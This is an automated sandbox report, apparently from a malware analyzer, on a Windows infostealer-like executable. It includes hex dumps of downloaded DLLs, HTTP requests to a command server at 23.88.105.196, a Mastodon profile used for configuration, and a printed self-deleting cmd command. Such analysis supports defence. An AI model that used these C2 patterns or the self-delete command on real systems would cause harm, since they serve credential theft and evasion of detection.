00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 
74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 
00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                            Server: nginx
                            Date: Mon, 27 Sep 2021 16:33:10 GMT
                            Content-Type: application/x-msdos-program
                            Content-Length: 83784
                            Connection: keep-alive
                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                            ETag: "14748-57aa1f0b0df80"
                            Expires: Tue, 28 Sep 2021 16:33:10 GMT
                            Cache-Control: max-age=86400
                            X-Cache-Status: EXPIRED
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: eo Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track versio equals www.facebook.com (Facebook)
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/1008
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/freebl3.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/mozglue.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/mozglue.dll$
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/msvcp140.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/nss3.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/nss3.dllO
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://23.88.105.196/softokn3.dll
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/plp
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0N
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://ocsp.thawte.com0
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: http://service.real.cop
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: mozglue[1].dll.1.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: nss3[1].dll.1.dr | String found in binary or memory: http://www.mozilla.com0
                        Source: temp.1.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: temp.1.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: temp.1.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: temp.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: temp.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
                        Source: temp.1.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/tootsuite/mastodon
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://joinmastodon.org/apps
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: https://mas.to
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://mas.to/
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://mas.to/avatars/original/missing.png
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://mas.to/users/killern0
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://mas.to/users/killern0/followers
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://mas.to/users/killern0/following
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: https://media.mas.to
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | String found in binary or memory: https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c
                        Source: temp.1.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: temp.1.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: nss3[1].dll.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
                        Source: temp.1.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknown | HTTP traffic detected: POST /1008 HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                            Content-Length: 25
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                            Data Ascii: --1BEF0A57BE110FD467A--
                        Source: unknown | DNS traffic detected: queries for: mas.to
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00410340 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global traffic | HTTP traffic detected: GET /@killern0 HTTP/1.1
                            Host: mas.to
                        Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1
                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                            Host: 23.88.105.196
                            Connection: Keep-Alive
                        Source: unknown | HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2
                        Source: T6zZFfRLqs.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00413270
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041E780
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00498990
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041DBF0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00439000
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_004AD033
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_004690E0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0049D0F0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00421200
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_004982C0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_004B22EF
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00450340
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00421360
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00464400
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: String function: 00401020 appears 53 times
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: String function: 0049CF02 appears 36 times
                        Source: T6zZFfRLqs.exe, 00000001.00000003.373993056.00000000030AA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs T6zZFfRLqs.exe
                        Source: T6zZFfRLqs.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: T6zZFfRLqs.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown | Process created: C:\Users\user\Desktop\T6zZFfRLqs.exe 'C:\Users\user\Desktop\T6zZFfRLqs.exe'
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "T6zZFfRLqs.exe")
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/18@1/3
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: T6zZFfRLqs.exe, 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, nss3[1].dll.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                        Source: T6zZFfRLqs.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: T6zZFfRLqs.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: softokn3.dll.1.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: softokn3.dll.1.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                        Source: T6zZFfRLqs.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3.dll.1.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s;
                        Source: softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3.dll.1.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: T6zZFfRLqs.exe, nss3[1].dll.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                        Source: softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: nss3[1].dll.1.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00417000 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,Process32Next,CloseHandle,
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: T6zZFfRLqs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
                        Source: Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
                        Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
                        Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                        Source: Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
                        Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
